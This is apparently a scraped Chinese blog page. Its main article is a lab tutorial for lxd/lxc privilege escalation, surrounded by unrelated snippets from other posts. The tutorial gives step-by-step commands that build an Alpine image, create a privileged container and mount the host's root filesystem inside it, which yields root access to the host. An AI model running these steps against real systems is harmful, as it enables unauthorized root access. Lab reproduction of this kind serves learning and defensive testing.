当前位置：首页 > news >正文

lxd提权

news 2026/5/24 5:53:03

lxd/lxc提权

漏洞介绍

lxd是一个root进程，它可以负责执行任意用户的lxd，unix套接字写入访问操作。而且在一些情况下，lxd不会调用它的用户权限进行检查和匹配

原理可以理解为用用户创建一个容器，再用容器挂载宿主机磁盘，最后使用容器权限操作宿主机磁盘内容达到提权效果

提权复现

环境：攻击机kali 192.168.31.131 靶机 192.168.31.134

在攻击机kali上操作

通过git将构建好的alpine镜像克隆到本地,并构建

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

然后将自己操作系统对应架构tar文件发送到靶机上

python -m http.server 8848

然后在下载的目录上使用此命令导入镜像

lxc image import ./alpine*.tar.gz --alias myimage

初始化镜像,一路回车选择默认，不过会有几个显示以及存在default，让你重命名的，选择了就可以

lxd init

可能最后报错，但是也没关系

例如

运行镜像

lxc init myimage mycontainer -c security.privileged=true

将/root挂载到镜像中

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

与镜像交互

lxc start mycontainer
lxc exec mycontainer /bin/sh

lxc start mycontainer
lxc exec mycontainer /bin/sh

lxd提权

lxd/lxc提权漏洞介绍 lxd是一个root进程，它可以负责执行任意用户的lxd，unix套接字写入访问操作。而且在一些情况下，lxd不会调用它的用户权限进行检查和匹配原理可以理解为用用户创建一个容器，再用容器挂载宿主机磁盘&#xf…...

编程日记 2023/12/1 3:15:40

系统基本信息 nvidia-smi’ nvidia-smi 470.182.03 driver version:470.182.03 cuda version: 11.4 查看系统体系结构 uname -aUTC 2023 x86_64 x86_64 x86_64 GNU/Linux 下载miniconda https://mirrors.tuna.tsinghua.edu.cn/anaconda/miniconda/?CM&OA https://mi…...

编程日记 2023/12/1 3:13:37

leetcode：用栈实现队列（先进先出）

题目描述题目链接：232. 用栈实现队列 - 力扣（LeetCode） 题目分析我们先把之前写的数组栈的实现代码搬过来用栈实现队列最主要的是实现队列先进先出的特点，而栈的特点是后进先出，那么我们可以用两个栈来实现&…...

编程日记 2023/12/1 3:11:35

＜JavaEE＞什么是进程控制块（PCB Process Control Block）？

目录一、进程控制块的概念二、进程控制块的重要属性 2.1 唯一身份标识（PID） 2.2 内存指针 2.3 文件描述符表 2.4 状态 2.5 优先级 2.6 记账信息 2.7 上下文一、进程控制块的概念进程控制块（Process Control Block, PCB&#xff…...

编程日记 2023/12/1 3:10:34

简历上的工作经历怎么写

通过了简历筛选，后续的面试官会仔细阅读你的简历内容。他们在找什么呢？他们希望搞清楚你在某一段经历中具体干了什么，并且判断你的能力具体达到了什么水平。简历在线制作下载：百度幻主简历面试官喜欢具体的经历越具体&#x…...

编程日记 2023/12/1 3:07:31

数值分析总结

数值分析总结思维导图 Docs 相关代码的使用和注释列主元Gauss消元法 %%列主元高斯消元法 function xGauss_lzy(A,b)%A为方程组系数矩阵，b为方程组的右侧向量，x为方程组的解 [n,m]size(A);%%得到矩阵A的行和列的宽度 nblength(b);%%方程组右侧向量的长…...

编程日记 2023/12/1 3:06:29

osg demo汇总

1.example_osganimate 演示了路径动画的使用（AnimationPath、AnimationPathCallback），路径动画回调能够做用在Camera、CameraView、MatrixTransform、PositionAttitudeTransform等四种类型的节点上。演示了osgSim::OverlayNode的使用node 2…...

编程日记 2023/12/1 3:05:29

Leetcode.1590 使数组和能被 P 整除

题目链接 Leetcode.1590 使数组和能被 P 整除 rating : 2039 题目描述给你一个正整数数组 n u m s nums nums，请你移除最短子数组（可以为空），使得剩余元素的和能被 p p p 整除。不允许将整个数组都移除。请你返回你需…...

编程日记 2023/12/1 3:04:26

uniappios请求打开麦克风 uniapp发起请求

第一种 ajax请求方式 uni.request(OBJECT) 参数名类型必填默认值说明平台差异说明urlString是开发者服务器接口地址dataObject/String/ArrayBuffer否请求的参数App（自定义组件编译模式）不支持ArrayBuffer类型headerObject否设置请求的 header，header 中不能设置 Referer。…...

编程日记 2023/12/1 3:03:25

Java 注解在 Android 中的使用场景

Java 元注解有 5 种，常用的是 Target 和 Retention 两个。其中 Retention 表示保留级别，有三种： RetentionPolicy.SOURCE - 标记的注解仅保留在源码级别中，并被编译器忽略RetentionPolicy.CLASS - 标记的注解在编译时由编译器保…...

编程日记 2023/12/1 3:00:23

【开源】基于Vue和SpringBoot的数字化社区网格管理系统

项目编号： S 042 ，文末获取源码。 \color{red}{项目编号：S042，文末获取源码。} 项目编号：S042，文末获取源码。目录一、摘要1.1 项目介绍1.2 项目录屏二、功能模块三、开发背景四、系统展示五、核心源码5…...

编程日记 2023/12/1 2:58:20

Go语言简要介绍

Golang是一种编程语言，也称为Go或者Go语言。它是由Google开发的一种编译型、静态类型的语言。Golang的目标是提高程序开发的效率，同时保证程序的性能和安全。 Golang在语法结构上类似于C语言，但是通过引入新的概念和语法，比如gor…...

编程日记 2023/12/1 2:57:15

STM32H7 RTC及PC13问题

程序加了RTC时间过后，发现原本的RTC定时唤醒中断也不好使了，开始以为是PC13入侵检测引脚问题，经过测试，发现了一个大问题，当使用 HAL_RTC_SetTime(&hrtc, &time, RTC_FORMAT_BCD); 函数后，RTC变得…...

编程日记 2023/12/1 2:56:14

AntDB“超融合+流式实时数仓”——颠覆50年未变的数据库内核

流式处理引擎，颠覆50年未变的数据库内核流式处理的概念 2001年9月11日，美国世贸大楼被袭击，美国国防部第一次将“主动预警”纳入国防的宏观战略规划。而IBM作为当时全球最大的IT公司，承担了大量基础支撑软件研发的任务。其中200…...

编程日记 2023/12/1 2:55:12

TZOJ 1376 母牛的故事(递推和递归）

答案1（递推）： #include<stdio.h> int main() {int n0,i0;int a[55] { 0,1,2,3,4 }; //数组下标就相当于过了几年，以第四年母牛生出的第一只小母牛成年为周期，初始化前四年的值while (scanf("%d", …...

编程日记 2023/12/1 2:52:09

五种多目标优化算法（MOPSO、MOAHA、NSGA2、NSGA3、MOGWO）求解微电网多目标优化调度（MATLAB）

一、多目标优化算法简介 （1）多目标粒子群优化算法MOPSO 多目标应用：基于多目标粒子群优化算法MOPSO求解微电网多目标优化调度（MATLAB代码）-CSDN博客 （2）多目标人工蜂鸟算法（MOAHA…...

编程日记 2023/12/1 2:50:04

01_原理-事件循环

01_原理-事件循环文章目录 01_原理-事件循环一、浏览器的进程模型①：何为进程？②：何为线程？③：浏览器有哪些进程和线程？ 二、渲染主线程是如何工作的？三、若干解释①：何为异步&…...

编程日记 2023/12/1 2:49:03

Redis的性能，哨兵模式，集群，

Redis的性能管理; redis的数据保存在内存中 redis-cli info memory redis内存使用info memory命令参数解析 used_memory:236026888 由 Redis 分配器分配的内存总量，包含了redis进程内部的开销和数据占用的内存，以字节（byte&#xff09…...

编程日记 2023/12/1 2:48:02

如何选择共模噪声滤波器

在当前电子产品中，绝大多数的高速信号都使用地差分对结构。差分结构有一个好处就是可以降低外界对信号的干扰，但是由于设计的原因，在传输结构上还会受到共模噪声的影响。共模噪声滤波器就可以用于抑制不必要的共模噪声，而不会对…...

编程日记 2023/12/1 2:47:00

Python与设计模式--模板模式

23种计模式之前言 （5）单例模式、工厂模式、简单工厂模式、抽象工厂模式、建造者模式、原型模式、(7)代理模式、装饰器模式、适配器模式、门面模式、组合模式、享元模式、桥梁模式、（11）策略模式、责任链模式、命令模式、中介者模…...

编程日记 2023/12/1 2:45:59

相场模拟结合贝叶斯优化：高效探索电池枝晶抑制与快充的权衡设计

1. 项目概述：当相场模拟遇见贝叶斯优化在金属电池，尤其是锂金属电池的研发前线，我们这些工程师和科学家每天都在与一个“幽灵”作斗争——枝晶。这些在充电过程中从金属负极表面肆意生长的针状或苔藓状晶体，不仅是导致电池容量衰减…...

编程新知 2026/5/24 5:32:07

Keil µVision项目复制后构建失败的诊断与解决

1. 问题现象与背景解析最近在Keil Vision开发环境中遇到一个典型的"项目复制后构建失败"问题：将一个原本正常编译的C语言项目复制到新目录后，仅做了少量修改，却突然出现error (40): expected an identifier or (的语法错误。这种情…...

编程新知 2026/5/24 4:48:42

渐变风格出图率暴跌47%？紧急修复方案：3个被忽略的种子值+--no参数协同干预策略

更多请点击： https://kaifayun.com 第一章：渐变风格出图率暴跌47%的现象溯源与归因分析近期多个主流AIGC平台监测数据显示，采用CSS渐变（linear-gradient、radial-gradient等）作为核心视觉特征的生成式设计稿&#x…...

编程新知 2026/5/24 4:22:12

教师今晚必须做的1件事：用Claude 3.5 Sonnet重写你的公开课逐字稿——实测课堂语言感染力提升58%（附对比音频+评分报告）

更多请点击： https://codechina.net 第一章：Claude 3.5 Sonnet在教育内容创作中的范式跃迁传统教育内容生产长期受限于人力密集、周期冗长与个性化不足三大瓶颈。Claude 3.5 Sonnet凭借其增强的推理深度、100K上下文窗口及显著优化的指令遵循能力&…...

编程新知 2026/5/24 4:18:06